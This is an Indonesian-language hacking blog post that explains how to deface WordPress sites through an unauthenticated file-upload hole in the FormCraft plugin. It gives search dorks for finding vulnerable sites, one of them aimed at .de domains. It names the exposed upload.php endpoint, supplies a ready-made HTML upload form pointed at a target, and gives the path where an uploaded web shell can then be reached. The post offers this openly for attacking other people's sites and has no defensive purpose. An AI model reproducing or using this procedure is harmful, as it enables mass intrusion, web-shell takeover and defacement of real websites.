Thursday, March 1, 2018

Cara Deface FormCraft File upload

              Cara Deface FormCraft File Upload

Hai gaes ketemu lagi sama Mr.Greatskiller
 udah lama gak post
Biasa faktor males :v
Langsung ae
Dork :
- inurl:"wp-content//plugins/formcraft/"
- inurl:"wp-content//plugins/formcraft/" site:.de
(sisanya kembangin lagi ya Om dorknya, biar dapet banyak web Vuln and Verawan :v wkwkw )

Exploit :

1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/


Script CSRF :
<br />
<form action="http://www.target.co.li/wp-content/plugins/formcraft/file-upload/server/php/upload.php" enctype="multipart/form-data" method="POST">
<input name="files[]" type="file" /><button>Upload</button>
</form>
*Save AS: .html
*ganti target.co.li ~&gt; menjadi url link target sobat

Cari target menggunakan dork di atas
Lalu masukkan exploitnya
Sekarang tinggal apa ? Ya lo masukin target csrf lah lu upload shell atau script lo

Shell Access :
target.co.li/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php

Reactions:

2 comments:

 
The Alien